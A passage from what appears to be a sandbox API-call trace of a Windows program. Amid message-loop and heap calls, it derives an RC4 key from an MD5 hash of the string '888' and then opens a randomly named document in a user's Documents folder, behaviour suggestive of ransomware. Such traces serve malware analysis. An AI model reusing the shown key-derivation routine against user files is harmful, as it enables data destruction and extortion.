hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.936] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0221.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.936] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0221.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.937] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.937] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.937] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.937] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.937] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.937] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.937] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.937] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.937] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.937] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.937] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.938] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.938] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.938] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.938] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0221.938] CryptCreateHash (in: hProv=0xa7bc48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0221.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72718, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.939] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0221.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72648, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.939] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.939] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabc20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0221.939] CryptHashData (hHash=0x9e2078, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0221.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.939] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.939] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.940] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.940] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0221.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabce0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0221.940] CryptDeriveKey (in: hProv=0xa7bc48, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0221.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.940] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.940] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0221.940] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.940] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0221.940] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0221.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0221.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0221.941] CryptDestroyHash (hHash=0x9e2078) returned 1 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb00 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0221.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0221.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0221.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0221.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0221.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.942] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/xocV7C6c.odp" (normalized: "c:\\users\\fd1hvy\\documents\\xocv7c6c.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0221.943] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.943] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0221.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0221.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0221.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0221.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0221.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854920 [0221.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.945] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0221.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854920 | out: hHeap=0x2af0000) returned 1 [0221.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0221.945] RtlAllocateHeap 